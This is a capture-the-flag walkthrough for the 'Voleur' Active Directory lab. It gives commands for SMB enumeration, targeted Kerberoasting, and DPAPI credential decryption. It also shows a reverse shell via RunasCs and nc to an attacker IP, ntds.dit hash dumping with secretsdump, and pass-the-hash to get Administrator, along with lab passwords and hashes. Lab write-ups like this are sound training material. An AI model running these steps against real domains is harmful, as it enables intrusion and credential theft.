# Voleur ## 0x1 Recon ### Rustscan *  ### Nmap *  ## 0x1 Credential xlsx * Got a hash from netexec `timeroast` module, but can't crack hash now *  *  * Enumerate SMB with nxc *  *  ```bash= nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' --shares -k nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' --shares -k --spider IT --content --regex Encrypt ``` * Download excel file from SMB IT folder *  ```bash= nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' --shares -k --get-file 'First-Line Support/Access_Review.xlsx' './Access_Review.xlsx' --share IT ``` * Has password protected, so cracked password with `office2john`&`john` *  *  * Some credential in there *  *  * `todd.wolfe:NightT1meP1dg3on14 | svc_ldap:M1XyC9pW7qT5Vn | svc_iis:N5pXyW1VqM7CZ8` ## 0x2 Shell as svc_winrm * But the user `Todd.Wolfe` has been deleted, so I checked the bloodhound and found `svc_ldap` in `restore_users` group, maybe can restore the user *  * Try `target kerberoast attack` via `targetkerberoast.py`, update the `/etc/krb5.conf` first *  *  *  *  ```bash= sudo vim /etc/krb5.conf export KRB5CCNAME=/tmp/krb5cc_$(id -u) python targetedKerberoast.py -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -v -k --dc-host dc.voleur.htb ``` * Crack password with `john` *  * `svc_winrm:AFireInsidedeOzarctica980219afi` * Generate krb5 file *  ```bash= nxc smb dc.voleur.htb -u svc_winrm -p AFireInsidedeOzarctica980219afi -k --generate-krb5-file krb5.conf ``` * Asking the TGT ticket *  ```bash= getTGT.py voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi ``` * Connect winrm as svc_winrm *  ## 0x3 Restore user(Todd.Wolfe) * Use `RunasCs` switch to `svc_ldap` *  *  ```bash= ./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn powershell -r 10.10.16.2:4444 rlwrap -cAr nc -lvnp 4444 ``` * Check deleted object *  ```powershell= Get-ADObject -Filter 'SamAccountName -eq "todd.wolfe"' -IncludeDeletedObjects ``` * Restore Object *  ```powershell= Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db' ``` * Asking the TGT for `todd.wolfe` *  ```bash= getTGT.py voleur.htb/todd.wolfe:NightT1meP1dg3on14 ``` ## 0x4 DPAPI * Follow the article below, I use `smbclient.py` download the file(/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110) to decrypt the master key for DPAPI * https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets *  *  * Use `dpapi.py` decrypt the master key (file in C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID) *  ```bash= dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14 ``` ## 0x5 Shell as svc_backup * Decrypted the protect data (file in C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\) *  * `jermy.combs:qT3V9pLXyN7W4m` ```bash dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 ``` * Asking TGT for `jermy.combs` *  * SMB again and got note, id_rsa *  *  * Now we can ssh as `svc_backup` *  *  * `sudo su` to root *  ## 0x6 Shell as Administrator * All C disk files in `/mnt` *  * Download the SYSTEM and ntds.dit *  * Use `secretdump` dump the hash *  `Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::` ```bash= scp -r -P 2222 -i id_rsa svc_backup@10.10.11.76:"/mnt/c/IT/Third-Line Support/Backups/Active Directory" . secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -history LOCAL ``` * Asking administrator's TGT *  ```bash= getTGT.py voleur.htb/administrator -hashes aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2 -dc-ip 10.10.11.76 ``` * Shell as administrator via evil-winrm *  *